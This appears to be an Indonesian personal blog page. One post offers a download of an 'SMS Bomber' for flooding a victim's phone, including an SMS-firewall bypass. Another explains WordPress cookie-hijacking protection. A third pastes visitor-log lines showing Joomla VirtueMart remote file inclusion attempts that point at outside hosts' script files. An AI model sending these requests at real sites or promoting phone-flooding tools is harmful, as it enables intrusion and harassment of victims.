[[*]] – Blogz nya YaDoY666 – [[*]]

Setelah beberapa waktu yang lalu saya membahas tentang SMS Control dengan memanfaatkan Gammu, pada kesempatan kali ini saya coba membahas tentang SMS Bomber. Sms bomber kali ini merupakan pengembangan dari artikel saya sebelum nya “Control Your Machine With SMS”.

Yang dimaksud dengan SMS Bomber adalah sebuah program komputer yang di program untuk melakukan pengiriman SMS secara terus-menerus dalam jumlah yang telah kita tentukan sebelumnya.  Efek dari SMS Bomber sangat berbahaya karna selain mengganggu sang korban yang handphone nya akan berbunyi dan getar-getar terus, SMS Bomber juga dapat menyebabkan Handphone target akan hang dan restart. Oleh karna itu saya tegaskan disini, “Saya tidak bertanggung jawab atas akibat yang ditimbulkan oleh artikel ini. USE IT WITH YOUR OWN RISK.”

Untuk membuat SMS Bomber ini saya menggunakan Visual Basic 6.0, dan masih memanfaatkan Gammu untuk send & recieve sms dari handphone. Didalam SMS Bomber saya ini telah saya tambahkan sedikit trik untuk melewati SMS Firewall yang terdapat pada beberapa handphone (beberapa handphone produksi china telah dilengkapi SMS Firewall). Thank to StardustMemory for the Idea.

Untuk menggunakan SMS Bomber ini, komputer anda harus terinstall MySQL dan Gammu, baca artikel saya sebelum nya tentang untuk melakukan konfigurasi & menjalankan Gammu, tanpa MySQL & Gammu yang terpasang di komputer anda, SMS Bomber ini tidak akan dapat bekerja.

Download Source Code nya disini

[[*]] Disclaimer [[*]]

Penulis tidak bertanggung jawab atas segala akibat yang ditimbulkan oleh artikel ini. Semua akibat yang ditimbulkan tanggung jawab masing-masing individu. USE IT WITH YOUR OWN RISK.

Cookie adalah serangkaian teks yang disimpan pada komputer Anda oleh situs web yang Anda kunjungi. Pada umumnya cookie menyimpan pengaturan atau preferensi Anda untuk suatu situs web tertentu, misalnya bahasa yang dipilih, atau lokasi (negara) Anda. Ketika Anda kembali ke situs web tersebut, Browser akan mengirimkan cookie yang bersesuaian kepada situs web yang bersangkutan. Dengan cara ini, situs dapat menampilkan informasi yang sesuai dengan pengaturan atau preferensi Anda.

Cookie dapat menyimpan berbagai jenis informasi, termasuk di antaranya informasi pribadi seperti nama, alamat rumah, alamat email, atau nomor telepon Anda. Akan tetapi informasi ini hanya akan disimpan jika Anda pernah memberikan informasi ini kepada situs tersebut. Situs web tidak dapat mengakses informasi yang tidak pernah Anda berikan kepada situs web tersebut, dan situs web juga tidak dapat mengakses berkas lainnya pada komputer Anda. Secara bawaan (default), aktivitas menyimpan dan mengirim cookie tidak pernah terlihat oleh pengguna

Cookie Hijacking adalah satu metoda yang digunakan para hacker untuk melakukan penetrasi dengan cara melakukan pencurian cookie.  Berikut penjelasan tentang Cookie Hijacking yang saya ambil dari wikipedia.

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

Mencegah Cookie Hijacking pada Wordpress dapat dilakukan dengan cara yang sangat simple yaitu dengan cara mengenkrip cookie nya. Bagaimana cara mengenkrip cookie pada wordpress? Untuk melakukan nya buka file wp-config.php anda  lalu cari beberapa baris ini pada file tersebut

define(’AUTH_KEY’, ‘put your unique phrase here’);
define(’SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(’LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(’NONCE_KEY’, ‘put your unique phrase here’);

Lalu buka link berikut ini http://api.wordpress.org/secret-key/1.1/ dan kopi isi dari file tersebut yang di generate secara otomatis oleh wordpress, kemudian ganti 4 baris diatas dengan apa yang sudah kita kopi tadi, kemudian save file tersebut.

Dan Gotcha…!!!

Wordpress yang anda miliki telah aman dari Cookie Hijacking.  Simple sekali bukan? Trik ini dapat digunakan untuk Wordpress versi 2.6.0 atau versi yang lebih tinggi.

Referensi : http://en.wikipedia.org/wiki/HTTP_cookie

Perhatikan baik-baik beberapa baris visitor log dibawah ini yang gw paste dari log file yang udah gw pasang di blog gw.

http://yadoy666.serverisdown.org/2008/02?option=com_garyscookbook&Itemid=SBUN&func=detail&id=http://musicadelibreria.net/footer??

27-01-2010 09:24 am GMT-7         72.233.48.150         United States Plano, TX             http://yadoy666.serverisdown.org/category/joomla%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://klammhoster.de/cache/faq??
27-01-2010 10:05 am GMT-7         209.172.33.230         Canada Montreal, CA                 http://yadoy666.serverisdown.org//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt??
27-01-2010 10:08 am GMT-7         77.79.246.80         Poland Jastrzebie Zdroj, PL         http://yadoy666.serverisdown.org/category/joomla%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt??
27-01-2010 10:10 am GMT-7         206.225.93.58         United States Overland Park, KS     http://yadoy666.serverisdown.org/category//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt??

Hahahaha…

Coba liat baik-baik dan silahkan ngakak sepuas nya bagi yang dah ngerti letak kelucuan dari log tersebut. Hahahahaha..

Hacker… Oh Hacker…

Blog gw make WordPress Mas, ngapain lu make Exploit nya Joomla buat pentest di blog gw ini, dan sejak kapan gw bikin toko online di blog gw…. Hadoooooh… Ada-ada aja ini bang Hacker, bikin ngakak aja pagi-pagi gini… Tiap hari pula dia ngelakuin hal bodoh itu… wkwkwk… Ada-ada aja ^_^

Nih buat yg pengen liad tingkah nya si hacker itu yang kecatet dari tanggal 24 Januari 2010 sampai dengan 2 Februari 2010 Klik Disini

Update…!!!

Dah jelas-jelas disini udah diposting kalo dia itu begok inject wp make exploit joomla, eh dia masih usaha juga, makek exploit yang sama pulak, com_virtuemart juga lagi yang dipakek. Hahahaha… Nampaknya sangat bersemangat sekali hacker ini sampe-sampe dia nggak sadar klo sedang melakukan hal bodoh… Check this one out  Click Here